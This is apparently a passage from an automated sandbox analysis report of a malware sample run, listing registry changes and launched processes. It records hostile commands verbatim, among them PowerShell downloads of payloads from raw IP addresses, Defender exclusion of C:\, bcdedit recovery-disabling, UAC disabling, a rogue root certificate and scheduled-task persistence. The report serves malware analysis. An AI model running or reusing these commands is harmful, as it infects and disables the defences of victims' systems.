| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9ff97ab58,0x7ff9ff97ab68,0x7ff9ff97ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4340 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4768 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4968 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3272 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Users\Admin\Desktop\New Text Document.exe
"C:\Users\Admin\Desktop\New Text Document.exe"
C:\Users\Admin\Desktop\a\volumeinfo.exe
"C:\Users\Admin\Desktop\a\volumeinfo.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Users\Admin\Desktop\a\Zinker.exe
"C:\Users\Admin\Desktop\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\smartsoftsignew.exe
"C:\Users\Admin\Desktop\a\smartsoftsignew.exe"
C:\Users\Admin\Desktop\a\ADServices.exe
"C:\Users\Admin\Desktop\a\ADServices.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\Desktop\a\New.exe
"C:\Users\Admin\Desktop\a\New.exe"
C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x40,0x12c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Users\Admin\Desktop\a\volumeinfo.exe
"C:\Users\Admin\Desktop\a\volumeinfo.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 640 -ip 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 312
C:\Users\Admin\Desktop\a\GTA_V.exe
"C:\Users\Admin\Desktop\a\GTA_V.exe"
C:\Users\Admin\Desktop\a\CapSimple.exe
"C:\Users\Admin\Desktop\a\CapSimple.exe"
C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp" /SL5="$130258,18247052,1148416,C:\Users\Admin\Desktop\a\GTA_V.exe"
C:\Users\Admin\Desktop\a\RambledMimets.exe
"C:\Users\Admin\Desktop\a\RambledMimets.exe"
C:\Users\Admin\Desktop\a\ld.exe
"C:\Users\Admin\Desktop\a\ld.exe"
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
C:\Users\Admin\Desktop\a\MSiedge.exe
"C:\Users\Admin\Desktop\a\MSiedge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled no
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5168 -ip 5168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5168 -ip 5168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1596
C:\Users\Admin\Desktop\a\victor.exe
"C:\Users\Admin\Desktop\a\victor.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5060 -ip 5060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 232
C:\Users\Admin\Desktop\a\RambledMime.exe
"C:\Users\Admin\Desktop\a\RambledMime.exe"
C:\Users\Admin\Desktop\a\current.exe
"C:\Users\Admin\Desktop\a\current.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\host_so.exe
"C:\Users\Admin\Desktop\a\host_so.exe"
C:\Users\Admin\Desktop\a\mixinte.exe
"C:\Users\Admin\Desktop\a\mixinte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\Desktop\a\inte.exe
"C:\Users\Admin\Desktop\a\inte.exe"
C:\Users\Admin\Desktop\a\winlogon.exe
"C:\Users\Admin\Desktop\a\winlogon.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe
"C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7420 -ip 7420
